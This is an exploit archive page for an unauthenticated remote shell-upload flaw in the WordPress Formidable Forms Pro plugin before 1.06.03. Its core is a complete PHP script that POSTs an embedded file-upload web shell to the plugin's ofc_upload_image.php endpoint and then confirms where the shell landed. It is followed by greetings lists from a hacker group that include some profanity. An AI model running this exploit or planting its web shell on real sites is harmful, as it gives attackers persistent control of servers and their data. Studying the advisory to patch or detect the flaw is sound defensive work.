what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Formidable Forms Remote Code Execution

WordPress Formidable Forms Remote Code Execution
Posted May 11, 2014
Authored by Manish Tanwar

WordPress Formidable Forms plugin versions prior to 1.06.03 suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | b16a0ff1ee72bc7cbc62b95ba719d380830cab01b91c82b060de619b30d131d2

WordPress Formidable Forms Remote Code Execution

Change Mirror Download
##############################################################################################
# Exploit Title : wordpress plugin "Formidable Forms" Remote code execution exploit
# Exploit Author : Manish Kishan Tanwar
# vendor Link : http://wordpress.org/plugins/formidable/
# Version Affected: below verson 1.06.03(only pro version)
# Discovered At : IndiShell LAB (indishell.in aka indian cyber army)
# Love to : zero cool,Team indishell,Hardeep Singh
##############################################################################################


////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters ($_GET[ 'name' ] and $HTTP_RAW_POST_DATA)
there is no security check on these parameters and can be exploited by attacker

vulnerable link
http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php

shell will be here
http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/tmp-upload-images/shell.php

///////////////////////
/// exploit code ////
///////////////////////

<!--exploit code by Team INDISHELL(Manish Tanwar)-->
<?php

$web="http://127.0.0.1";
$shell="ica_shell.php";
$file="wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php?name=";
$up="/wp-content/plugins/formidable/pro/js/tmp-upload-images/";
$upshell=$up.$shell;
$data = '<?php
echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>";
if( isset($_POST[\'sut\']) )
{
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']))
{
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";
}
else {
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";
}
}
?>';
$link=$web;
$target = trim($link.$file.$shell);
$fshell=$link.$upshell;

$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');


$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r'))
{
echo "shell has been uploaded :D here is shell link<br><a href= ".$fshell.">".$fshell."</a>";
}
else
{
echo "sorry :( ";
}
?>
/////////////////////
end of exploit code
////////////////////


--==[[ Greetz To ]]==--
############################################################################################################################################
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas
Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash
cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen
lovetherisk,brown suger and rest of TEAM INDISHELL
############################################################################################################################################
--==[[Love to]]==--
# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close